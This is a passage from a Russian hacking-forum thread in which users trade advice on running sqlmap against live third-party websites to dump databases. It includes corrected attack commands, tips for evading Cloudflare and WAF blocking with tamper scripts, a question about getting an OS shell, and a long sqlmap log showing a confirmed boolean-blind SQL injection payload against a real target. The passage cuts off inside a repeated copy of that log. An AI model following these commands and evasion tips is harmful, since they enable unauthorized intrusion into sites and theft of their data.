но сервер банит примерно через 5-6 запросов (появляется 521 ошибка от клауда)
пытался добавлять и time-sec и delay - не помогает. есть какие-то варианты обойти бан?


Используй тамперы клауд не пропустит запросы

RedFern.89
26.03.2018, 19:50
Matrix001 said:
↑ (https://antichat.live/posts/4196948/)
Побробуй рандомный user-agent. Еще можешь попробоват через прокси. Но скорее всего Cloud не пропустит.


пробовал уже и то, и другое

Sensoft
28.03.2018, 06:35
сайт.ру/oc/?pg=%2527&pgpos=10&pid=%5c

Как заставить мамп увидеть дырку?

она крутится но мамп не видит ****

по разному пытался не фига


Code:
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '\'; File: /var/www/html/us_production/affiliate/include/Affiliate/Scripts/Bl/ClickRegistrator.class.php; Line: 439
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1; SQL:SELECT merchant_service_image_path FROM cms_merchant_service_details WHERE merchant_service_id = '

Mafter
29.03.2018, 21:26
Здравствуйте, решил заняться сливом дампов, выбрал сайт для тренировки, акушей просканил и вот что получилось.

.SpoilerTarget" type="button">Spoiler: Скрин
http://skrinshoter.ru/i/290318/Mqgzs4H3.png
Хочу раскрутить уязвимость с помощью sqlmap, что прописывать в sqlmap? Вставлять ссылку с SQL injection?

Вот что в ссылке

.SpoilerTarget" type="button">Spoiler: Скрин
http://skrinshoter.ru/i/290318/DpA4MTw7.png
Перевел с джавы, получилось: "По запросу не найдено мест в матрице"

Я думаю написать в sqlmap:


Code:
slqmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3

Правильно или нет, и надо что-то добавить?

BabaDook
29.03.2018, 21:37
Mafter said:
↑ (https://antichat.live/posts/4197715/)
Здравствуйте, решил заняться сливом дампов, выбрал сайт для тренировки, акушей просканил и вот что получилось.
Spoiler: Скрин
http://skrinshoter.ru/i/290318/Mqgzs4H3.png
Хочу раскрутить уязвимость с помощью sqlmap, что прописывать в sqlmap? Вставлять ссылку с SQL injection?
Вот что в ссылке
Spoiler: Скрин
http://skrinshoter.ru/i/290318/DpA4MTw7.png
Перевел с джавы, получилось: "По запросу не найдено мест в матрице"
Я думаю написать в sqlmap:

Code:
slqmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3

Правильно или нет, и надо что-то добавить?


Нет, не правильно.

sqlmap -u site --data='Тут То что передаётся ПОСТ методом' для этого вам надо нажать на place_name->variant 1 там будет все необходимые параметы

Sensoft
29.03.2018, 23:18
Mafter said:
↑ (https://antichat.live/posts/4197715/)
Здравствуйте, решил заняться сливом дампов, выбрал сайт для тренировки, акушей просканил и вот что получилось.
Spoiler: Скрин
http://skrinshoter.ru/i/290318/Mqgzs4H3.png
Хочу раскрутить уязвимость с помощью sqlmap, что прописывать в sqlmap? Вставлять ссылку с SQL injection?
Вот что в ссылке
Spoiler: Скрин
http://skrinshoter.ru/i/290318/DpA4MTw7.png
Перевел с джавы, получилось: "По запросу не найдено мест в матрице"
Я думаю написать в sqlmap:

Code:
slqmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3

Правильно или нет, и надо что-то добавить?


у тебя 2 ошибки

1. Там пост метод надо описать уязвимый пареметр который находится в POST, --data="Тут пост параметр"

2. Ты не дописал --dbs

3. (совет) В случае акуши лучше чекни Blind SQL injection, sqlmamp такое быстро взламывает (лично у меня так)

erwerr2321
30.03.2018, 00:50
Sensoft said:
↑ (https://antichat.live/posts/4197741/)
sqlmamp такое быстро взламывает (лично у меня так)


враньё какое ...

Sensoft
30.03.2018, 00:52
ms13 said:
↑ (https://antichat.live/posts/4197760/)
враньё какое ...


У меня этот тип дыр SQLmap быстро вскрывает

erwerr2321
30.03.2018, 00:57
Sensoft said:
↑ (https://antichat.live/posts/4197761/)
У меня этот тип дыр SQLmap быстро вскрывает


Ого, таки похекал ту ico корпорацию?

Mafter
30.03.2018, 20:30
Sensoft said:
↑ (https://antichat.live/posts/4197741/)
у тебя 2 ошибки
1. Там пост метод надо описать уязвимый пареметр который находится в POST, --data="
Тут пост параметр
"
2. Ты не дописал --dbs
3. (совет) В случае акуши лучше чекни Blind SQL injection, sqlmamp такое быстро взламывает (лично у меня так)


а если в Blind SQL injection тоже самое, что и в SQL injection?? То есть, ссылки одинаковые

Миxей
02.04.2018, 19:41
Как залить Shell посредством sqlmap ?

--os-shell и брутить локальные пути ?

panic.ker
03.04.2018, 10:37
Тебе в соседней теме ответили, у пользователя под которым ты сидишь не хватает прав для этого!

RedFern.89
16.04.2018, 01:01
Подскажите, как бороться? Пытаюсь получить таблицы - выдает 406 ошибку


Code:
sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --
tables
___
__H__
___ ___[)]_____ ___ ___ {1.2.4.2#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

starting at 01:56:40

[01:56:40] [INFO] parsing HTTP request from '1.txt'
[01:56:40] [DEBUG] not a valid WebScarab log data
[01:56:40] [DEBUG] cleaning up configuration parameters
[01:56:40] [DEBUG] loading WAF script '360'
[01:56:40] [DEBUG] loading WAF script 'airlock'
[01:56:40] [DEBUG] loading WAF script 'anquanbao'
[01:56:40] [DEBUG] loading WAF script 'armor'
[01:56:40] [DEBUG] loading WAF script 'asm'
[01:56:40] [DEBUG] loading WAF script 'aws'
[01:56:40] [DEBUG] loading WAF script 'baidu'
[01:56:40] [DEBUG] loading WAF script 'barracuda'
[01:56:40] [DEBUG] loading WAF script 'bigip'
[01:56:40] [DEBUG] loading WAF script 'binarysec'
[01:56:40] [DEBUG] loading WAF script 'blockdos'
[01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
[01:56:40] [DEBUG] loading WAF script 'cloudflare'
[01:56:40] [DEBUG] loading WAF script 'cloudfront'
[01:56:40] [DEBUG] loading WAF script 'comodo'
[01:56:40] [DEBUG] loading WAF script 'datapower'
[01:56:40] [DEBUG] loading WAF script 'denyall'
[01:56:40] [DEBUG] loading WAF script 'dosarrest'
[01:56:40] [DEBUG] loading WAF script 'dotdefender'
[01:56:40] [DEBUG] loading WAF script 'edgecast'
[01:56:40] [DEBUG] loading WAF script 'expressionengine'
[01:56:40] [DEBUG] loading WAF script 'fortiweb'
[01:56:40] [DEBUG] loading WAF script 'generic'
[01:56:40] [DEBUG] loading WAF script 'hyperguard'
[01:56:40] [DEBUG] loading WAF script 'incapsula'
[01:56:40] [DEBUG] loading WAF script 'isaserver'
[01:56:40] [DEBUG] loading WAF script 'jiasule'
[01:56:40] [DEBUG] loading WAF script 'knownsec'
[01:56:40] [DEBUG] loading WAF script 'kona'
[01:56:40] [DEBUG] loading WAF script 'modsecurity'
[01:56:40] [DEBUG] loading WAF script 'naxsi'
[01:56:40] [DEBUG] loading WAF script 'netcontinuum'
[01:56:40] [DEBUG] loading WAF script 'netscaler'
[01:56:40] [DEBUG] loading WAF script 'newdefend'
[01:56:40] [DEBUG] loading WAF script 'nsfocus'
[01:56:40] [DEBUG] loading WAF script 'paloalto'
[01:56:40] [DEBUG] loading WAF script 'profense'
[01:56:40] [DEBUG] loading WAF script 'proventia'
[01:56:40] [DEBUG] loading WAF script 'radware'
[01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
[01:56:40] [DEBUG] loading WAF script 'safe3'
[01:56:40] [DEBUG] loading WAF script 'safedog'
[01:56:40] [DEBUG] loading WAF script 'secureiis'
[01:56:40] [DEBUG] loading WAF script 'senginx'
[01:56:40] [DEBUG] loading WAF script 'sitelock'
[01:56:40] [DEBUG] loading WAF script 'sonicwall'
[01:56:40] [DEBUG] loading WAF script 'sophos'
[01:56:40] [DEBUG] loading WAF script 'stingray'
[01:56:40] [DEBUG] loading WAF script 'sucuri'
[01:56:40] [DEBUG] loading WAF script 'tencent'
[01:56:40] [DEBUG] loading WAF script 'teros'
[01:56:40] [DEBUG] loading WAF script 'trafficshield'
[01:56:40] [DEBUG] loading WAF script 'urlscan'
[01:56:40] [DEBUG] loading WAF script 'uspses'
[01:56:40] [DEBUG] loading WAF script 'varnish'
[01:56:40] [DEBUG] loading WAF script 'wallarm'
[01:56:40] [DEBUG] loading WAF script 'watchguard'
[01:56:40] [DEBUG] loading WAF script 'webappsecure'
[01:56:40] [DEBUG] loading WAF script 'webknight'
[01:56:40] [DEBUG] loading WAF script 'wordfence'
[01:56:40] [DEBUG] loading WAF script 'yundun'
[01:56:40] [DEBUG] loading WAF script 'yunsuo'
[01:56:40] [DEBUG] loading WAF script 'zenedge'
[01:56:40] [DEBUG] setting the HTTP timeout
[01:56:40] [DEBUG] creating HTTP requests opener object
[01:56:40] [DEBUG] forcing back-end DBMS to user defined value
custom injection marker ('*') found in option '--data'. Do you want to process i
t? [Y/n/q] y
[01:56:41] [DEBUG] resolving hostname 'url'
[01:56:41] [INFO] testing connection to the target URL
[01:56:41] [DEBUG] declared web page charset 'utf-8'
[01:56:41] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
[01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewal
l (360)'
[01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
[01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application F
irewall (Anquanbao)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Def
ense)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manage
r (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web App
lication Firewall (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Fi
rewall (Baidu)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application F
irewall (Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security
Manager (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application F
irewall (BinarySEC)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisc
o Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application
Firewall (CloudFlare)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Fire
wall (Comodo)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IB
M)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Fi
rewall (DenyAll)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Intern
et Security)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Tech
nologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)
'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Fi
rewall (Fortinet)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application
Firewall (art of defence)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application F
irewall (Incapsula/Imperva)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Fir
ewall (Jiasule)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Ak
amai Technologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source We
b Application Firewall (Trustwave)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Applicatio
n Firewall (NetContinuum/Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'

[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application F
irewall (Newdefend)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Fir
ewall (NSFOCUS)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Al
to Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Fi
rewall (Armorlogic)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application S
ecurity (IBM)'
[01:56:42] [DEBUG] page not found (404)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMo
de (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firew
all'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Fir
ewall (Safedog)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Securi
ty (BeyondTrust)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporatio
n)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application
Firewall (SiteLock)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)
'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewa
ll (Riverbed / Brocade)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall
(Sucuri)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Applicati
on Firewall (Tencent Cloud Computing)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Fi
rewall Enterprise (Teros/Citrix Systems)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)
'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (Un
ited Security Providers)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Fir
ewall (Wallarm)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Tech
nologies)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'

[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firew
all (AQTRONIX)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Fire
wall (Yundun)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Fire
wall (Yunsuo)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Fir
ewall (Zenedge)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
[01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
[01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\art
em\appdata\local\temp\sqlmapuumtkb12408\sqlmapresp onse-opc2v1'. If you know the
details on used protection please report it along with specific response to 'dev
@sqlmap.org'
are you sure that you want to continue with further target testing? [y/N] y
[01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
Vector: AND [INFERENCE]
---
[01:56:44] [INFO] testing MySQL
[01:56:44] [DEBUG] resuming configuration option 'code' (200)
[01:56:44] [INFO] confirming MySQL
[01:56:44] [INFO] the back-end DBMS is MySQL
[01:56:44] [INFO] fetching banner
[01:56:44] [INFO] resumed: 5.6.39-cll-lve
[01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: Apache, PHP 7.1.14
back-end DBMS: MySQL >= 5.0.0
banner: '5.6.39-cll-lve'
[01:56:44] [INFO] fetching tables for database: 'database'
[01:56:44] [INFO] fetching number of tables for database 'database'
[01:56:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f757365727 3),1,1))>51
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) valid
ation step in similar cases
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f757365727 3),1,1))>48
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_S
CHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f757365727 3),1,1))>9
AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [INFO] retrieved:
[01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
[01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
[01:56:44] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[01:56:46] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
[01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
kind of protection is involved (e.g. WAF)
[01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlma
p\output\url'

BabaDook
16.04.2018, 01:21
RedFern.89 said:
↑ (https://antichat.live/posts/4202222/)
Подскажите, как бороться? Пытаюсь получить таблицы - выдает 406 ошибку

Code:
sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --
tables
___
__H__
___ ___[)]_____ ___ ___ {1.2.4.2#dev}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

starting at 01:56:40

[01:56:40] [INFO] parsing HTTP request from '1.txt'
[01:56:40] [DEBUG] not a valid WebScarab log data
[01:56:40] [DEBUG] cleaning up configuration parameters
[01:56:40] [DEBUG] loading WAF script '360'
[01:56:40] [DEBUG] loading WAF script 'airlock'
[01:56:40] [DEBUG] loading WAF script 'anquanbao'
[01:56:40] [DEBUG] loading WAF script 'armor'
[01:56:40] [DEBUG] loading WAF script 'asm'
[01:56:40] [DEBUG] loading WAF script 'aws'
[01:56:40] [DEBUG] loading WAF script 'baidu'
[01:56:40] [DEBUG] loading WAF script 'barracuda'
[01:56:40] [DEBUG] loading WAF script 'bigip'
[01:56:40] [DEBUG] loading WAF script 'binarysec'
[01:56:40] [DEBUG] loading WAF script 'blockdos'
[01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
[01:56:40] [DEBUG] loading WAF script 'cloudflare'
[01:56:40] [DEBUG] loading WAF script 'cloudfront'
[01:56:40] [DEBUG] loading WAF script 'comodo'
[01:56:40] [DEBUG] loading WAF script 'datapower'
[01:56:40] [DEBUG] loading WAF script 'denyall'
[01:56:40] [DEBUG] loading WAF script 'dosarrest'
[01:56:40] [DEBUG] loading WAF script 'dotdefender'
[01:56:40] [DEBUG] loading WAF script 'edgecast'
[01:56:40] [DEBUG] loading WAF script 'expressionengine'
[01:56:40] [DEBUG] loading WAF script 'fortiweb'
[01:56:40] [DEBUG] loading WAF script 'generic'
[01:56:40] [DEBUG] loading WAF script 'hyperguard'
[01:56:40] [DEBUG] loading WAF script 'incapsula'
[01:56:40] [DEBUG] loading WAF script 'isaserver'
[01:56:40] [DEBUG] loading WAF script 'jiasule'
[01:56:40] [DEBUG] loading WAF script 'knownsec'
[01:56:40] [DEBUG] loading WAF script 'kona'
[01:56:40] [DEBUG] loading WAF script 'modsecurity'
[01:56:40] [DEBUG] loading WAF script 'naxsi'
[01:56:40] [DEBUG] loading WAF script 'netcontinuum'
[01:56:40] [DEBUG] loading WAF script 'netscaler'
[01:56:40] [DEBUG] loading WAF script 'newdefend'
[01:56:40] [DEBUG] loading WAF script 'nsfocus'
[01:56:40] [DEBUG] loading WAF script 'paloalto'
[01:56:40] [DEBUG] loading WAF script 'profense'
[01:56:40] [DEBUG] loading WAF script 'proventia'
[01:56:40] [DEBUG] loading WAF script 'radware'
[01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
[01:56:40] [DEBUG] loading WAF script 'safe3'
[01:56:40] [DEBUG] loading WAF script 'safedog'
[01:56:40] [DEBUG] loading WAF script 'secureiis'
[01:56:40] [DEBUG] loading WAF script 'senginx'
[01:56:40] [DEBUG] loading WAF script 'sitelock'
[01:56:40] [DEBUG] loading WAF script 'sonicwall'
[01:56:40] [DEBUG] loading WAF script 'sophos'
[01:56:40] [DEBUG] loading WAF script 'stingray'
[01:56:40] [DEBUG] loading WAF script 'sucuri'
[01:56:40] [DEBUG] loading WAF script 'tencent'
[01:56:40] [DEBUG] loading WAF script 'teros'
[01:56:40] [DEBUG] loading WAF script 'trafficshield'
[01:56:40] [DEBUG] loading WAF script 'urlscan'
[01:56:40] [DEBUG] loading WAF script 'uspses'
[01:56:40] [DEBUG] loading WAF script 'varnish'
[01:56:40] [DEBUG] loading WAF script 'wallarm'
[01:56:40] [DEBUG] loading WAF script 'watchguard'
[01:56:40] [DEBUG] loading WAF script 'webappsecure'
[01:56:40] [DEBUG] loading WAF script 'webknight'
[01:56:40] [DEBUG] loading WAF script 'wordfence'
[01:56:40] [DEBUG] loading WAF script 'yundun'
[01:56:40] [DEBUG] loading WAF script 'yunsuo'
[01:56:40] [DEBUG] loading WAF script 'zenedge'
[01:56:40] [DEBUG] setting the HTTP timeout
[01:56:40] [DEBUG] creating HTTP requests opener object
[01:56:40] [DEBUG] forcing back-end DBMS to user defined value
custom injection marker ('*') found in option '--data'. Do you want to process i
t? [Y/n/q] y
[01:56:41] [DEBUG] resolving hostname 'url'
[01:56:41] [INFO] testing connection to the target URL
[01:56:41] [DEBUG] declared web page charset 'utf-8'
[01:56:41] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
[01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewal
l (360)'
[01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
[01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application F
irewall (Anquanbao)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Def
ense)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manage
r (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web App
lication Firewall (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Fi
rewall (Baidu)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application F
irewall (Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security
Manager (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application F
irewall (BinarySEC)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisc
o Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application
Firewall (CloudFlare)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Fire
wall (Comodo)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IB
M)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Fi
rewall (DenyAll)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Intern
et Security)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Tech
nologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)
'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Fi
rewall (Fortinet)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application
Firewall (art of defence)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application F
irewall (Incapsula/Imperva)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Fir
ewall (Jiasule)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Ak
amai Technologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source We
b Application Firewall (Trustwave)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Applicatio
n Firewall (NetContinuum/Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'

[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application F
irewall (Newdefend)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Fir
ewall (NSFOCUS)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Al
to Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Fi
rewall (Armorlogic)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application S
ecurity (IBM)'
[01:56:42] [DEBUG] page not found (404)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMo
de (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firew
all'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Fir
ewall (Safedog)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Securi
ty (BeyondTrust)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporatio
n)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application
Firewall (SiteLock)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)
'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewa
ll (Riverbed / Brocade)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall
(Sucuri)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Applicati
on Firewall (Tencent Cloud Computing)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Fi
rewall Enterprise (Teros/Citrix Systems)'
